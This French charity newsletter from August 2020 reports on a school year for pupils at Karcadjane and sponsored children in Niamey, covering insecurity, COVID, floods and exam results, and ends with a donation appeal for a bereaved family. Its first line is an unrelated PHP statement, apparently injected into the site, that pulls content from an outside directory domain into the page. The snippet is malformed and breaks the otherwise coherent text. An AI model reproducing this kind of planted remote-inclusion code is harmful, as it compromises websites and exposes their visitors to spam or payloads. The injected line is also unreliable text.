<? echo file_get_contents("http://www;liste-annuaires.com/listeannuaires.php); ?>

Bilan scolaire 2019/2020

                                                                                            le 19 août 2020

 

                            Le moment est venu de tirer les conclusions ou presque de cette année scolaire 2019/2020, année difficile pour les enfants pour de multiples raisons:

1 ) A Karcadjane : 

                             Malgré l'insécurité grandissante liée aux groupes djihadistes et aux bandes armées, malgré le COVID et les différentes restrictions, Atayoub et son instituteur ont réussi à mener à bien leur objectif, faire fonctionner le plus normalement possible l'école Maguy Vautier de Karcadjane. Les enfants sont donc en vacances, pour la plupart, dans le Gourma. L'école ouvrira à nouveau ses portes le 1er septembre, et comme chaque année les élèves rentreront dès le retour des familles et des animaux. Mais pour cette année 2020/2021, à l'insécurité s'ajoute l'incertitude politique encore plus importante depuis le coup d'état du 18 août dernier. Mais Atayoub et Fayçal seront fidèles au poste malgré tous les nuages qui s'amoncellent sur le pays.

                             Atayoub nous a fait parvenir un rapport pour l'année 2019/ 2020 que vous trouverez ci-dessous:Rapport fermeture ecole k 2019 2020Rapport fermeture ecole k 2019 2020 1

                         Vous constaterez que le nombre d'enfants est une nouvelle fois en augmentation: 148 enfants dont 88 garçons et 60 filles répartis en 5 cours ( rapport filles/garçons plus bas que l'an dernier: 40%).

                           N.B.: comprendre par manque de direction, manque de vision à terme.

2) A Niamey:

                - le Covid en tout premier lieu qui a perturbé le deuxième trimestre et la fin d'année scolaire avec des conséquences importantes pour les élèves. Pour les passages en classe supérieure, toutes les écoles ont organisé des contrôles de fin d'année perdant de vue les objectifs d'examen pour les classes de 3ème et terminales. Les élèves n'ont eu que peu de temps pour se préparer véritablement aux épreuves.

                - d'autre part des pluies torrentielles ont généré des inondations emportant le peu de choses que les familles accumulaient sous la tente. Plusieurs familles ont perdu une partie des toiles qui les protégeaient, et cela en pleine période d'examen du brevet des collèges. Aujourd'hui, il pleut toujours et les prévisions sont pessimistes jusqu'à la fin du mois. Certaines familles ont été aidées par des dons d'adhérents, mais la majorité aujourd'hui est en grande difficulté. Les moustiques se multiplient et les crises de paludisme touchent toutes les familles.

                   - 5 enfants passaient le brevet. Le bilan n'est pas très positif : 1 réussite, 1 élève admis à l'oral et 3 échecs.

                   - les épreuves du baccalauréat se sont achevées en fin de semaine dernière. Les résultats nous parviendront dans une dizaine de jours.

                   - concernant l'étudiante en école des cadres, les épreuves du master 1 se déroulent parfaitement. Il ne lui reste plus qu' une seule matière à passer pour réussir. Résultat prévu fin août.

                   - La reprise des cours, bien qu'imprécise, semble se dessiner pour le 15 septembre pour les collèges et lycée, le 1er octobre pour les écoles primaires. Dès que les élèments d'inscription pour la nouvelle année seront connus, nous contacterons les parrains/marraines.

Dernière minute:

                    Nous apprenons le décès accidentel de Raïssa Hamidoune (41 ans), papa d'une de nos petites filleules Gaïchatou. Cet homme brave et courageux fauché par un camion alors qu'il se déplaçait à pied sur le bord de la route laisse une famille, durement touchée lors des derniers mois, dans un complet dénuement: obligation de déménager loin du centre ville en raison d'une règle établie par les autorités en raison du Covid ( limitation des tentes sur les terrains); perte de pratiquement tout le matériel lors des inondations récentes; décès de Raïssa. La maman,totalement démunie se retrouve seule avec 3 jeunes enfants.

Famille hamidoune

                    Merci à tous ceux qui souhaitent l'aider de nous faire parvenir leur don à l'ordre de MALINIA ( en indiquant au dos du chèque  "Aide Famille Hamidoune ") à l'adresse suivante:

                   Jean Claude Lorin- 141 chemin des Cottes d'Embourre- 83440- Callian